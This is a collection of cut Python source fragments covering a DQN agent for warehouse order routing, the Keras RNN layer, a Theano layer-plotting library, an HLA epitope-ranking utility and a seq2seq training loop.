self.lookahead_agent = LookaheadAgent(env)
super().__init__(env, mlp_dqn, epsilon=epsilon, **kwargs)
def get_state_vector(self, state):
lookahead_action = self.lookahead_agent.get_action(
state
) # Todo: this calls too many lookaheads.
# TODO also consider using the cost vector directly.
lookahead_onehot = np.zeros(state.physical_network.num_dcs) * 0.0
lookahead_onehot[lookahead_action] = 1.0
latest_open_order = state.open[0]
customer_id = state.physical_network.get_customer_id(
latest_open_order.customer.node_id
)
mask_vector = state.physical_network.dcs_per_customer_array[customer_id, :]
# state_vector = np.hstack((mask_vector, lookahead_onehot))
state_vector = lookahead_onehot
self.logger.debug("MLP with Cheat state vector (lookahead onehotted)")
self.logger.debug(lookahead_onehot)
self.logger.debug(" and valid warehouses are: ")
self.logger.debug(mask_vector)
return lookahead_onehot
def train(self, experience):
"""This is not needed, it's handled by PTL"""
pass
class MaskedPlusOneHotDQN(nn.Module):
"""The combination of MaskedNLP and CustomerOneHot"""
def __init__(self, num_customers, num_dcs):
super().__init__()
self.num_dcs = num_dcs
self.num_customers = num_customers
self.net = nn.Sequential(
nn.Linear(self.num_dcs + self.num_customers, 64),
nn.ReLU(),
nn.Linear(64, 32),
nn.ReLU(),
nn.Linear(32, 16),
nn.ReLU(),
nn.Linear(16, self.num_dcs),
)
def forward(self, x):
return self.net(x.float())
class MaskedPlusOneHotDQNAgent(PyTorchAgent):
"""An MLP whose input is the mask of which DCS are valid, concatenated with customer onehot."""
def __init__(self, env, mlp_dqn, epsilon, **kwargs):
super().__init__(env, mlp_dqn, epsilon=epsilon, **kwargs)
def get_state_vector(self, state):
return (
state_to_mask_concat_onehot(state).detach().numpy()
) # TODO inefficient as hell.
def train(self, experience):
pass
class FullMLPDQN(nn.Module):
"""The combination of MaskedNLP and CustomerOneHot"""
def __init__(self, num_customers, num_dcs, num_commodities):
super().__init__()
self.num_dcs = num_dcs
self.num_customers = num_customers
self.num_commodities = num_commodities
# Calculating input size.
mask_size = num_dcs
onehot_size = num_customers
inventory_size = num_commodities * num_dcs
demand = num_commodities
backlog = num_commodities
inventory_after_current_order = num_dcs # A vector of size |W| that says if the current order fits in each dc.
input_size = (
mask_size
+ onehot_size
+ inventory_size
+ demand
+ backlog
+ inventory_after_current_order
)
# Don't be fooled, the layer sizes were pretty arbitrary.
# self.net = nn.Sequential(
# nn.Linear(input_size, input_size * 4),
# nn.LayerNorm(
# input_size * 4
# ), # TODO dont understand why batchnorm1d dont work, probably some shape think. Look for the diff between these two.
# nn.ReLU(),
# nn.Linear(input_size * 4, input_size * 2),
# nn.LayerNorm(
# input_size * 2
# ), # TODO dont understand why batchnorm1d dont work, probably some shape think. Look for the diff between these two.
# nn.ReLU(),
# nn.Linear(input_size * 2, input_size),
# nn.LayerNorm(
# input_size
# ), # TODO dont understand why batchnorm1d dont work, probably some shape think. Look for the diff between these two.
# nn.ReLU(),
# nn.Linear(input_size, input_size // 2),
# nn.LayerNorm(
# input_size // 2
# ), # TODO dont understand why batchnorm1d dont work, probably some shape think. Look for the diff between these two.
# nn.ReLU(),
# nn.Linear(input_size // 2, self.num_dcs),
# )
# Small wide
# self.net = nn.Sequential(
# nn.Linear(input_size, 256), nn.Tanh(), nn.Linear(256, self.num_dcs)
# )
# Linear
# self.net = nn.Sequential(nn.Linear(input_size, self.num_dcs))
# Small wide noisy
# self.net = nn.Sequential(
# NoisyLinear(input_size, 256), nn.Tanh(), NoisyLinear(256, self.num_dcs)
# )
# Linear Noisy
self.net = nn.Sequential(nn.Linear(input_size, self.num_dcs))
def forward(self, x):
normalized_in = | |
as initial
state for the sample of index i in the following batch.
unroll: Boolean (default False).
If True, the network will be unrolled,
else a symbolic loop will be used.
Unrolling can speed-up a RNN,
although it tends to be more memory-intensive.
Unrolling is only suitable for short sequences.
input_dim: dimensionality of the input (integer or tuple of integers).
This argument (or alternatively, the keyword argument `input_shape`)
is required when using this layer as the first layer in a model.
input_length: Length of input sequences, to be specified
when it is constant.
This argument is required if you are going to connect
`Flatten` then `Dense` layers upstream
(without it, the shape of the dense outputs cannot be computed).
Note that if the recurrent layer is not the first layer
in your model, you would need to specify the input length
at the level of the first layer
(e.g. via the `input_shape` argument)
time_major: The shape format of the `inputs` and `outputs` tensors.
If True, the inputs and outputs will be in shape
`(timesteps, batch, ...)`, whereas in the False case, it will be
`(batch, timesteps, ...)`. Using `time_major = True` is a bit more
efficient because it avoids transposes at the beginning and end of the
RNN calculation. However, most TensorFlow data is batch-major, so by
default this function accepts input and emits output in batch-major
form.
Input shape:
N-D tensor with shape `(batch_size, timesteps, ...)` or
`(timesteps, batch_size, ...)` when time_major is True.
Output shape:
- if `return_state`: a list of tensors. The first tensor is
the output. The remaining tensors are the last states,
each with shape `(batch_size, state_size)`, where `state_size` could
be a high dimension tensor shape.
- if `return_sequences`: N-D tensor with shape
`(batch_size, timesteps, output_size)`, where `output_size` could
be a high dimension tensor shape, or
`(timesteps, batch_size, output_size)` when `time_major` is True.
- else, N-D tensor with shape `(batch_size, output_size)`, where
`output_size` could be a high dimension tensor shape.
# Masking
This layer supports masking for input data with a variable number
of timesteps. To introduce masks to your data,
use an [Embedding](embeddings.md) layer with the `mask_zero` parameter
set to `True`.
# Note on using statefulness in RNNs
You can set RNN layers to be 'stateful', which means that the states
computed for the samples in one batch will be reused as initial states
for the samples in the next batch. This assumes a one-to-one mapping
between samples in different successive batches.
To enable statefulness:
- specify `stateful=True` in the layer constructor.
- specify a fixed batch size for your model, by passing
if sequential model:
`batch_input_shape=(...)` to the first layer in your model.
else for functional model with 1 or more Input layers:
`batch_shape=(...)` to all the first layers in your model.
This is the expected shape of your inputs
*including the batch size*.
It should be a tuple of integers, e.g. `(32, 10, 100)`.
- specify `shuffle=False` when calling fit().
To reset the states of your model, call `.reset_states()` on either
a specific layer, or on your entire model.
# Note on specifying the initial state of RNNs
You can specify the initial state of RNN layers symbolically by
calling them with the keyword argument `initial_state`. The value of
`initial_state` should be a tensor or list of tensors representing
the initial state of the RNN layer.
You can specify the initial state of RNN layers numerically by
calling `reset_states` with the keyword argument `states`. The value of
`states` should be a numpy array or list of numpy arrays representing
the initial state of the RNN layer.
# Note on passing external constants to RNNs
You can pass "external" constants to the cell using the `constants`
keyword argument of `RNN.__call__` (as well as `RNN.call`) method. This
requires that the `cell.call` method accepts the same keyword argument
`constants`. Such constants can be used to condition the cell
transformation on additional static inputs (not changing over time),
a.k.a. an attention mechanism.
Examples:
```python
# First, let's define a RNN Cell, as a layer subclass.
class MinimalRNNCell(keras.layers.Layer):
def __init__(self, units, **kwargs):
self.units = units
self.state_size = units
super(MinimalRNNCell, self).__init__(**kwargs)
def build(self, input_shape):
self.kernel = self.add_weight(shape=(input_shape[-1], self.units),
initializer='uniform',
name='kernel')
self.recurrent_kernel = self.add_weight(
shape=(self.units, self.units),
initializer='uniform',
name='recurrent_kernel')
self.built = True
def call(self, inputs, states):
prev_output = states[0]
h = K.dot(inputs, self.kernel)
output = h + K.dot(prev_output, self.recurrent_kernel)
return output, [output]
# Let's use this cell in a RNN layer:
cell = MinimalRNNCell(32)
x = keras.Input((None, 5))
layer = RNN(cell)
y = layer(x)
# Here's how to use the cell to build a stacked RNN:
cells = [MinimalRNNCell(32), MinimalRNNCell(64)]
x = keras.Input((None, 5))
layer = RNN(cells)
y = layer(x)
```
"""
def __init__(self,
cell,
return_sequences=False,
return_state=False,
go_backwards=False,
stateful=False,
unroll=False,
time_major=False,
**kwargs):
if isinstance(cell, (list, tuple)):
cell = StackedRNNCells(cell)
if not hasattr(cell, 'call'):
raise ValueError('`cell` should have a `call` method. '
'The RNN was passed:', cell)
if not hasattr(cell, 'state_size'):
raise ValueError('The RNN cell should have '
'an attribute `state_size` '
'(tuple of integers, '
'one integer per RNN state).')
super(RNN, self).__init__(**kwargs)
self.cell = cell
if isinstance(cell, checkpointable.CheckpointableBase):
self._track_checkpointable(self.cell, name='cell')
self.return_sequences = return_sequences
self.return_state = return_state
self.go_backwards = go_backwards
self.stateful = stateful
self.unroll = unroll
self.time_major = time_major
self.supports_masking = True
# The input shape is unknown yet, it could have nested tensor inputs, and
# the input spec will be the list of specs for flattened inputs.
self.input_spec = None
self.state_spec = None
self._states = None
self.constants_spec = None
self._num_constants = None
self._num_inputs = None
@property
def states(self):
if self._states is None:
state = nest.map_structure(lambda _: None, self.cell.state_size)
return state if nest.is_sequence(self.cell.state_size) else [state]
return self._states
@states.setter
def states(self, states):
self._states = states
def compute_output_shape(self, input_shape):
if isinstance(input_shape, list):
input_shape = input_shape[0]
# Check whether the input shape contains any nested shapes. It could be
# (tensor_shape(1, 2), tensor_shape(3, 4)) or (1, 2, 3) which is from numpy
# inputs.
try:
input_shape = tensor_shape.as_shape(input_shape)
except (ValueError, TypeError):
# A nested tensor input
input_shape = nest.flatten(input_shape)[0]
batch = input_shape[0]
time_step = input_shape[1]
if self.time_major:
batch, time_step = time_step, batch
if _is_multiple_state(self.cell.state_size):
state_size = self.cell.state_size
else:
state_size = [self.cell.state_size]
def _get_output_shape(flat_output_size):
output_dim = tensor_shape.as_shape(flat_output_size).as_list()
if self.return_sequences:
if self.time_major:
output_shape = tensor_shape.as_shape([time_step, batch] + output_dim)
else:
output_shape = tensor_shape.as_shape([batch, time_step] + output_dim)
else:
output_shape = tensor_shape.as_shape([batch] + output_dim)
return output_shape
if getattr(self.cell, 'output_size', None) is not None:
# cell.output_size could be nested structure.
output_shape = nest.flatten(nest.map_structure(
_get_output_shape, self.cell.output_size))
output_shape = output_shape[0] if len(output_shape) == 1 else output_shape
else:
# Note that state_size[0] could be a tensor_shape or int.
output_shape = _get_output_shape(state_size[0])
if self.return_state:
def _get_state_shape(flat_state):
state_shape = [batch] + tensor_shape.as_shape(flat_state).as_list()
return tensor_shape.as_shape(state_shape)
state_shape = nest.map_structure(_get_state_shape, state_size)
return generic_utils.to_list(output_shape) + nest.flatten(state_shape)
else:
return output_shape
def compute_mask(self, inputs, mask):
if isinstance(mask, list):
mask = mask[0]
output_mask = mask if self.return_sequences else None
if self.return_state:
state_mask = [None for _ in self.states]
return [output_mask] + state_mask
else:
return output_mask
def build(self, input_shape):
# Note input_shape will be list of shapes of initial states and
# constants if these are passed in __call__.
if self._num_constants is not None:
constants_shape = input_shape[-self._num_constants:] # pylint: disable=invalid-unary-operand-type
constants_shape = nest.map_structure(
lambda s: tuple(tensor_shape.TensorShape(s).as_list()),
constants_shape)
else:
constants_shape = None
if isinstance(input_shape, list):
input_shape = input_shape[0]
# The input_shape here could be a nest structure.
# do the tensor_shape to shapes here. The input could be single tensor, or a
# nested structure of tensors.
def get_input_spec(shape):
if isinstance(shape, tensor_shape.TensorShape):
input_spec_shape = shape.as_list()
else:
input_spec_shape = list(shape)
batch_index, time_step_index = (1, 0) if self.time_major else (0, 1)
if not self.stateful:
input_spec_shape[batch_index] = None
input_spec_shape[time_step_index] = None
return InputSpec(shape=tuple(input_spec_shape))
def get_step_input_shape(shape):
if isinstance(shape, tensor_shape.TensorShape):
shape = tuple(shape.as_list())
# remove the timestep from the input_shape
return shape[1:] if self.time_major else (shape[0],) + shape[2:]
# Check whether the input shape contains any nested shapes. | |
"""
All parameters (excluding superparameters) in the model should be in theano var-
iables or theano shared values. In the training part, these variables should be
organized into "theano.function"s. So there should be no theano.function in the
definition of models here. Except for analysis part of codes.
"""
import numpy
import theano
import theano.tensor as T
from theano.tensor.nnet import conv
from theano.tensor.signal import pool
import matplotlib
# matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pdb
class Layer(object):
def __init__(self, n_in, n_out, varin=None):
"""
Parameters
-----------
n_in : int
n_out : int
varin : theano.tensor.TensorVariable, optional
"""
self.n_in = n_in
self.n_out = n_out
if not varin:
varin = T.matrix('varin')
assert isinstance(varin, T.TensorVariable)
self.varin = varin
if not hasattr(self, 'params'):
self.params = [] # to be implemented by subclass
self.patch_ind = numpy.asarray([]) # needed by plotting.
self.givens_activation = {} # hist_activation() is going to need it.
def fanin(self):
raise NotImplementedError("Must be implemented by subclass.")
def output(self):
raise NotImplementedError("Must be implemented by subclass.")
def activ_prime(self):
"""
Value of derivative of the activation function w.r.t fanin(), given
fanin() as the argument of the derivative funciton.
"""
raise NotImplementedError("Must be implemented by subclass.")
def _print_str(self):
return self.__class__.__name__ + ": " + str(self.n_in) + " --> " \
+ str(self.n_out)
def print_layer(self):
print self._print_str()
def __add__(self, other):
"""It is used for conveniently construct stacked layers."""
assert isinstance(other, Layer), "Addition not defined."
if hasattr(self, 'models_stack'):
models_left = self.models_stack
else:
models_left = [self]
if hasattr(other, 'models_stack'):
models_right = other.models_stack
else:
models_right = [other]
models_stack = models_left + models_right
return StackedLayer(models_stack=models_stack, varin=self.varin)
# Following are for analysis ----------------------------------------------
def wTw(self, verbose=True, filename='wTw_layerw.png'):
assert hasattr(self, 'w'), "The layer need to have weight defined."
if not hasattr(self, '_wTw'):
self.get_w_cov = theano.function([], T.dot(self.w.T, self.w))
self._wTw = plt.figure()
self.wTw_ax = self._wTw.add_subplot(111)
plt.gray()
plt.title(self._print_str() + ': wTw')
self.wTw_ip = self.wTw_ax.imshow(self.get_w_cov())
else:
self.wTw_ip.set_data(self.get_w_cov())
self._wTw.canvas.draw()
if verbose:
plt.pause(0.05)
else:
plt.savefig(filename)
def naiveplot_weight(self, verbose=True,
filename='naiveplot_layerw.png'):
assert hasattr(self, 'w'), "The layer need to have weight defined."
if not hasattr(self, '_naiveplot_weight'):
if not hasattr(self, 'get_w'):
self.get_w = theano.function([], self.w.T.T)
self._naiveplot_weight = plt.figure()
self.naive_ax = self._naiveplot_weight.add_subplot(111)
plt.gray()
plt.title('weight matrix ' + self._print_str())
self.naive_ip = self.naive_ax.imshow(self.get_w())
else:
self.naive_ip.set_data(self.get_w())
self._naiveplot_weight.canvas.draw()
if verbose:
plt.pause(0.05)
else:
plt.savefig(filename)
def hist_weight(self, verbose=True, filename='hist_layerw.png'):
"""
Parameters
-----------
verbose : bool
filename : string
Returns
-----------
Notes
-----------
"""
assert hasattr(self, 'w'), "The layer need to have weight defined."
if not hasattr(self, '_hist_weight'):
if not hasattr(self, 'get_w'):
self.get_w = theano.function([], self.w.T.T)
self._hist_weight = plt.figure()
self.hist_ax = self._hist_weight.add_subplot(111)
else:
self.hist_ax.cla()
n, bins, patches = self.hist_ax.hist(
self.get_w().flatten(), 50, facecolor='blue'
)
self._hist_weight.canvas.draw()
plt.title('weight histogram ' + self._print_str())
if verbose:
plt.pause(0.05)
else:
plt.savefig(filename)
def draw_weight(self, patch_shape=None, map_function=None, npatch=None,
border=1, bordercolor=(0.0, 0.0, 0.0),
verbose=True, filename='draw_layerw.png',
*imshow_args, **imshow_keyargs):
"""
Adapted from <NAME>'s code.
Display an array of images in RGB or grey format.
Parameters
-----------
patch_shape : tuple of integers, has to contain 3 entries.
First and second entries for the size on X and Y direction, the
third entry for the number of channels. So the third entry has to
be 1 for grey image or 3 for RGB image.
map_function : theano.function
Maps the weight back through the preprocessing steps to get
resonable representations of the filters. It should take no inputs
and output the desired representation of weights.
npatch : int
border : int
Size of the border.
bordercolor : a tuple of 3 entries.
Stands for the RGB value of border.
verbose : bool
filename : str
Returns
-----------
Notes
-----------
Map the weights into a resonable representation by applying it onto
a theano function 'map_function.' If not given, it displays weights
by directly reshaping it to the shape specified by patch_shape. The
weight array should finally be in the shape of:
npatch x patch_shape[0] x patch_shape[1] x patch_shape[2]
Here we assume that the map_fun, or the input to the layer if map_fun
is not provided, are placed in the order of [RRRRGGGGBBBB].
"""
assert hasattr(self, 'w'), "The layer need to have weight defined."
if map_function == None:
if not hasattr(self, 'get_w'):
self.get_w = theano.function([], self.w.T.T)
M = self.get_w()
if len(M.shape) == 2:
M = M.T
else:
assert isinstance(
map_function,
theano.compile.function_module.Function
), "map_function has to be a theano function with no input."
M = map_function()
if len(M.shape) == 2: # FC weight matrix
assert M.shape[0] == self.n_out, (
"Wrong M row numbers. Should be %d " % self.n_out + \
"but got %d." % M.shape[0])
max_patchs = self.n_out
elif len(M.shape) == 4: # ConvNet filter
# This will still cause problem for deeper Conv layers.
assert patch_shape == None, (
"You don't need to specify a patch_shape for ConvNet layers.")
patch_shape = (M.shape[2], M.shape[3], M.shape[1])
max_patchs = M.shape[0]
M = numpy.swapaxes(M, 1, 3)
M = numpy.swapaxes(M, 2, 3)
if npatch == None:
npatch = max_patchs
else:
assert npatch <= max_patchs, ("Too large npatch size. Maximum "
"allowed value %d " % max_patchs + \
"but got %d." % npatch)
if npatch != len(self.patch_ind):
if not hasattr(self, 'npy_rng'):
self.npy_rng = numpy.random.RandomState(123)
self.patch_ind = self.npy_rng.permutation(max_patchs)[:npatch]
M = M[self.patch_ind, :]
bordercolor = numpy.array(bordercolor)[None, None, :]
M = M.copy()
assert patch_shape is not None, ("Need a patch_shape for this case.")
for i in range(M.shape[0]):
M[i] -= M[i].flatten().min()
M[i] /= M[i].flatten().max()
height, width, channel = patch_shape
if channel == 1:
M = numpy.tile(M, 3)
elif channel != 3:
raise ValueError(
"3rd entry of patch_shape has to be either 1 or 3."
)
try:
M = M.reshape((npatch, height, width, 3), order='F')
except:
raise ValueError("Wrong patch_shape.")
vpatches = numpy.int(numpy.ceil(numpy.sqrt(npatch)))
hpatches = numpy.int(numpy.ceil(numpy.sqrt(npatch)))
vstrike = width + border
hstrike = height + border
# initialize image size with border color
im = numpy.array(bordercolor) * numpy.ones((hstrike * hpatches + border,
vstrike * vpatches + border,
1), dtype='<f8')
for i in range(vpatches):
for j in range(hpatches):
if i * hpatches + j < npatch:
im[
j * hstrike + border:j * hstrike + border + height,
i * vstrike + border:i * vstrike + border + width,
:
] = M[i * hpatches + j, :, :, :]
if not hasattr(self, '_draw_weight'):
imshow_keyargs["interpolation"]="nearest"
self._draw_weight = plt.figure()
self.draw_ax = self._draw_weight.add_subplot(111)
self.wimg = self.draw_ax.imshow(im, *imshow_args, **imshow_keyargs)
else:
self.wimg.set_data(im)
self._draw_weight.canvas.draw()
plt.title('weight plot ' + self._print_str())
if verbose:
plt.pause(0.05)
else:
plt.savefig(filename)
def hist_bias(self, verbose=True, filename='hist_layerb.png'):
"""
Parameters
-----------
verbose : bool
filename : string
Returns
-----------
Notes
-----------
"""
assert hasattr(self, 'b'), "The layer need to have biases defined."
if not hasattr(self, '_hist_bias'):
if not hasattr(self, 'get_b'):
self.get_b = theano.function([], self.b)
self._hist_bias = plt.figure()
self.histb_ax = self._hist_bias.add_subplot(111)
else:
self.histb_ax.cla()
n, bins, patches = self.histb_ax.hist(
self.get_b().flatten(), 50, facecolor='c'
)
self._hist_bias.canvas.draw()
plt.title('bias histogram ' + self._print_str())
if verbose:
plt.pause(0.05)
else:
plt.savefig(filename)
def hist_activation(self, givens={}, verbose=True,
filename='hist_activation.png'):
"""
Parameters
-----------
givens : dict
Specify the inputs needed for computing the activation in this
layer. This will be passed to givens parameter while building
theano function. Changing this dictionary will result in
recompiling the function again.
verbose : bool
filename : string
Returns
-----------
Notes
-----------
"""
if not hasattr(self, '_hist_activation'):
if not hasattr(self, 'get_activation') or \
self.givens_activation != givens:
self.givens_activation = givens
self.get_activation = theano.function(
[], self.output(), givens=givens)
self._hist_activation = plt.figure()
self.histact_ax = self._hist_activation.add_subplot(111)
else:
self.histact_ax.cla()
n, bins, patches = self.histact_ax.hist(
self.get_activation().flatten(), 50, facecolor='red'
)
self._hist_activation.canvas.draw()
plt.title('activation histogram ' + self._print_str())
if verbose:
plt.pause(0.05)
else:
plt.savefig(filename)
class StackedLayer(Layer):
def __init__(self, models_stack=[], varin=None):
"""
Ensure the following things:
1. By calling StackedLayer([...], [...]) we definitely get a stacked la-
yer.
2. StackedLayer as a whole can be viewed as a 1-layer model. (i.e. it
guarantees all features of Layer in an appropriate way.)
3. By calling
Layer(...) + Layer(...),
Layer(...) + StackedLayer(...),
StackedLayer(...) + Layer(...), or
StackedLayer(...) + StackedLayer(...)
we can get a *non-nested* StackedLayer object at its expression
value.
Although in the implementation of Layer and StackedLayer class we
carefully ensure that nested StackedLayer (i.e. a StackedLayer of
StackedLayers) does not cause problem, it | |
import numpy as np
import string
import re
__all__ = ['BADAA',
'AALPHABET',
'convertHLAAsterisk',
'isvalidmer',
'isvalidHLA',
'rankEpitopes',
'rankKmers',
'rankMers',
'getIC50',
'getMers',
'getMerInds',
'grabKmer',
'grabKmerInds',
'findpeptide',
'grabOverlappingKmer',
'overlappingMers']
BADAA = '-*BX#Z? '
AALPHABET = 'ACDEFGHIKLMNPQRSTVWY'
def convertHLAAsterisk(hlas):
"""Replace the * with _ in each HLA allele"""
repAsteriskPattern = re.compile('\*')
return [re.sub(repAsteriskPattern, '_', h) for h in hlas]
def isvalidmer(mer):
if not mer is None:
return not re.search('[%s]' % BADAA, mer)
else:
return False
def isvalidHLA(h, loci='AB'):
if h[0] in loci:
return True
else:
return False
def rankEpitopes(ba, hlaList, peptide, nmer = [8, 9, 10, 11], peptideLength = None):
"""Breaks peptide into kmers (all nmer lengths)
and rank all (hla, kmer) pairs by predicted IC50 in hlaPredCache ba
IDENTICAL to rankKmers but may have different performance?
Can be used to find the most likely optimal epitope in a peptide sequence.
Predictions that are not found in ba get a temporary prediction of 15 log-nM
Parameters
----------
ba : hlaPredCache
dict-like container of all (hla, kmer) IC50 values
hlaList : list
HLA alleles to be used as keys in ba
peptide : str
AA sequence
nmer : list
Integers indicating optimal lengths to be tested as kmers.
peptideLength : int or None
If a number is specified then a number of '.' padded kmers are included
so that there are always garaunteed to be a certain number of kmers and results
Returns
-------
ranks : ndarray int
Zero-based rankings of kmers based on predicted IC50 (lowest IC50, lowest rank)
sorti : ndarray int
Index that can be used to sort the returned arrays
kmers : ndarray object
Array of kmer strings in order by getMers() (can be sorted by rank with sorti)
ic50 : ndarray float
Predicted log-IC50 (log-nM) with the HLA allele with the lowest IC50
hla : ndarray object
Array of HLA alleles that were the best predicted binder to each kmer"""
merList = getMers(peptide, nmer, peptideLength)
kmers = np.empty((len(merList), len(hlaList)), dtype=object)
ic50 = np.ones((len(merList), len(hlaList))) * 15
hla = np.empty((len(merList), len(hlaList)), dtype=object)
for i, m in enumerate(merList):
for j, h in enumerate(hlaList):
kmers[i, j] = m
hla[i, j] = h
tmp = ba[(h, m)]
if not np.isnan(tmp):
ic50[i, j] = tmp
kmers = kmers.flatten()
ic50 = ic50.flatten()
hla = hla.flatten()
sorti = ic50.argsort()
ranks = np.empty(len(ic50), int)
ranks[sorti] = np.arange(len(ic50))
return (ranks, sorti, kmers, ic50, hla)
def rankKmers(ba, hlaList, peptide, nmer=[8, 9, 10, 11], peptideLength=None):
"""Breaks peptide into kmers (all nmer lengths)
and rank all (hla, kmer) pairs by predicted IC50 in hlaPredCache ba
IDENTICAL to rankEpitopes but may have different performance?
Can be used to find the most likely optimal epitope in a peptide sequence.
Predictions that are not found in ba get a temporary prediction of 15 log-nM
Parameters
----------
ba : hlaPredCache
dict-like container of all (hla, kmer) IC50 values
hlaList : list
HLA alleles to be used as keys in ba
peptide : str
AA sequence
nmer : list
Integers indicating optimal lengths to be tested as kmers.
peptideLength : int or None
If a number is specified then a number of '.' padded kmers are included
so that there are always garaunteed to be a certain number of kmers and results
Returns
-------
ranks : ndarray int
Zero-based rankings of kmers based on predicted IC50 (lowest IC50, lowest rank)
sorti : ndarray int
Index that can be used to sort the returned arrays
kmers : ndarray object
Array of kmer strings in order by getMers() (can be sorted by rank with sorti)
ic50 : ndarray float
Predicted log-IC50 (log-nM) with the HLA allele with the lowest IC50
hla : ndarray object
Array of HLA alleles that were the best predicted binder to each kmer"""
kmers = getMers(peptide, nmer, peptideLength)
result = rankMers(ba, hlaList, kmers)
return (result[0], result[1], kmers, result[2], result[3])
def rankMers(ba, hlaList, merList):
"""Ranks all (hla, mer) pairs by predicted IC50 found in hlaPredCache, ba
Can be used to find the most likely optimal epitope from a list.
Predictions that are not found in ba get a temporary prediction of 15 log-nM
Parameters
----------
ba : hlaPredCache
dict-like container of all (hla, kmer) IC50 values
hlaList : list
HLA alleles to be used as keys in ba
merList : list
Peptide sequences to be tests with each HLA allele
Returns
-------
ranks : ndarray int
Zero-based rankings of kmers based on predicted IC50 (lowest IC50, lowest rank)
sorti : ndarray int
Index that can be used to sort the returned arrays
kmers : ndarray object
Array of kmer strings in order by getMers() (can be sorted by rank with sorti)
ic50 : ndarray float
Predicted log-IC50 (log-nM) with the HLA allele with the lowest IC50
hla : ndarray object
Array of HLA alleles that were the best predicted binder to each kmer"""
ic50 = np.ones((len(merList))) * 15
hla = np.empty(len(merList), dtype=object)
for i, m in enumerate(merList):
if not '.' in m:
ic50[i], hla[i] = getIC50(ba, hlaList, m, returnHLA=True)
sorti = ic50.argsort()
ranks = np.empty(len(ic50), dtype=int)
ranks[sorti] = np.arange(len(ic50))
return (ranks, sorti, ic50, hla)
def getIC50(ba, hlaList, mer, nmer=[8, 9, 10, 11], returnHLA=False):
"""Return the IC50 from ba of the mer and its affinity with the most avid HLA in hlaList.
Or if len(pep)>11, return that of the most avid kmer
Parameters
----------
ba : hlaPredCache
dict-like container of all (hla, kmer) IC50 values
hlaList : list
HLA alleles to be used as keys in ba
mer : string
Peptide sequences to be tests with each HLA allele
nmer : list
Integers indicating optimal lengths to be tested as kmers.
returnHLA : bool
If True, return the HLA with the lowest binding affinity.
Returns
-------
ic50 : float
Log-IC50 from ba
hla : string (optional)
HLA allele with best binding"""
if ba is None:
raise NameError('Did not load IC50 values into ba!')
if len(mer) <= 11:
"""Minimum IC50 over the HLAs"""
ic50s = np.asarray([ba[(h, mer)] for h in hlaList])
hlas = hlaList
else:
"""Minimum IC50 over all the mers and all the HLAs"""
pairs = [getIC50(ba, hlaList, m, returnHLA=True) for m in getMers(mer, nmer)]
ic50s = np.asarray([p[0] for p in pairs])
hlas = [p[1] for p in pairs]
mini = np.argmin(ic50s)
if returnHLA:
return ic50s[mini], hlas[mini]
else:
return ic50s[mini]
def getMers(seq, nmer=[8, 9, 10, 11], seqLength=None):
"""Takes a AA sequence (string) and turns it into a list of 8, 9, 10, 11 mers
The seq will be padded with one or more '.' if it is shorter than seqLength
These indices will match the peptides created by getMers()
Paramters
---------
seq : str
Peptide sequence.
nmer : list
List of k's for the creation of all kmers.
seqLength : int
Minimum length of seq ('.' used for padding before applying the process)
Useful for garaunteeing that a certain number of kmers will be in the list.
Returns
-------
mers : list
All peptides of length nmer contained by seq"""
if not seqLength is None:
if len(seq) > seqLength:
seq = seq[:seqLength]
elif len(seq) < seqLength:
seq = string.ljust(seq, seqLength, '.')
mers = []
for n in nmer:
mers.extend([seq[i:i+n] for i in range(len(seq)-n+1)])
return mers
def getMerInds(seq, nmer=[8, 9, 10, 11], seqLength=None):
"""Takes a AA sequence (string) and turns it into a list of 8, 9, 10, 11 mers
The seq will be padded with one or more '.' if it is shorter than seqLength
These indices will match the peptides created by getMers()
Paramters
---------
seq : str
Peptide sequence.
nmer : list
List of k's for the creation of all kmers.
seqLength : int
Minimum length of seq ('.' used for padding before applying the process)
Useful for garaunteeing that a certain number of kmers will be in the list.
Returns
-------
mers : list
All peptides of length nmer contained by seq
mers : list
Seq indices for mers"""
if not seqLength is None:
| |
<filename>python/train_and_eval.py<gh_stars>1-10
import torch, random, sys, torch.nn as nn, re
from utils import *
def train(args, encoder, decoder, criterion, encoder_optimizer, decoder_optimizer, train_dl, epoch, visualize=False, params=None):
"""
One epoch
"""
if encoder:
encoder.train()
decoder.train()
total_loss = 0.0
total_tokens = 0.0
total_loss_unmutated = 0.0 # similar to above but not mutated to zero when logging
total_tokens_unmutated = 0.0 # similar to above but not mutated to zero when logging
for i, (encoder_inputs, decoder_inputs, decoder_outputs, _) in enumerate(train_dl):
# one training example
if args.development_mode and i == 100:
break
if encoder_optimizer:
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
encoder_context = encoder(encoder_inputs) if encoder else EncoderContext()
encoder_context = initialize_with_context(encoder, decoder, encoder_context, args)
use_teacher_forcing = True if random.random() < args.teacher_forcing_ratio else False
if use_teacher_forcing:
loss = decode(decoder, decoder_inputs, decoder_outputs, encoder_context, criterion, visualize=visualize, params=params)
if visualize:
return None
else: # FIXME: Fix this # NOTE: BROKEN! DO NOT USE!
print("Error: non-teacher forcing is not supported at this time.")
sys.exit(0)
# decoder_input = target_inputs[0].view(1, -1)
# for t in range(len(target_inputs[0])):
# decoder_output, decoder_hidden, decoder_attn = decoder(decoder_input, decoder_hidden, encoder_outputs)
# _, topi = decoder_output.topk(1) # [64, 1]
# decoder_input = torch.LongTensor([[topi[i][0] for i in range(batch_size)]])
# decoder_input = decoder_input.to(device)
# loss += criterion(decoder_output, target_outputs[0][t])
target_outputs = decoder_outputs.target_outputs
normalized_loss = loss / float(len(target_outputs[0]))
normalized_loss.backward()
total_tokens += len(target_outputs[0])
total_tokens_unmutated += len(target_outputs[0])
if encoder:
rnn_encoder_modules = list(
filter(lambda x: isinstance(x, nn.GRU) or isinstance(x, nn.LSTM), list(encoder.modules()))
)
if rnn_encoder_modules: # clip only when there is an encoder AND RNNs exists in encoder
torch.nn.utils.clip_grad_norm_(encoder.parameters(), args.clip) # TODO: clip gradients for the RNN params only?
torch.nn.utils.clip_grad_norm_(decoder.parameters(), args.clip)
if encoder_optimizer:
encoder_optimizer.step()
decoder_optimizer.step()
total_loss += loss.item()
total_loss_unmutated += loss.item()
# print logging info
if (args.log_step and i > 0 and i % args.log_step == 0) or (i == len(train_dl) - 1):
if i == args.log_step:
batch_size = args.log_step + 1
elif i == len(train_dl) - 1:
batch_size = len(train_dl) % args.log_step - 1
else:
batch_size = args.log_step
avg_loss_per_example = total_loss / float(batch_size)
avg_loss_per_word = total_loss / total_tokens
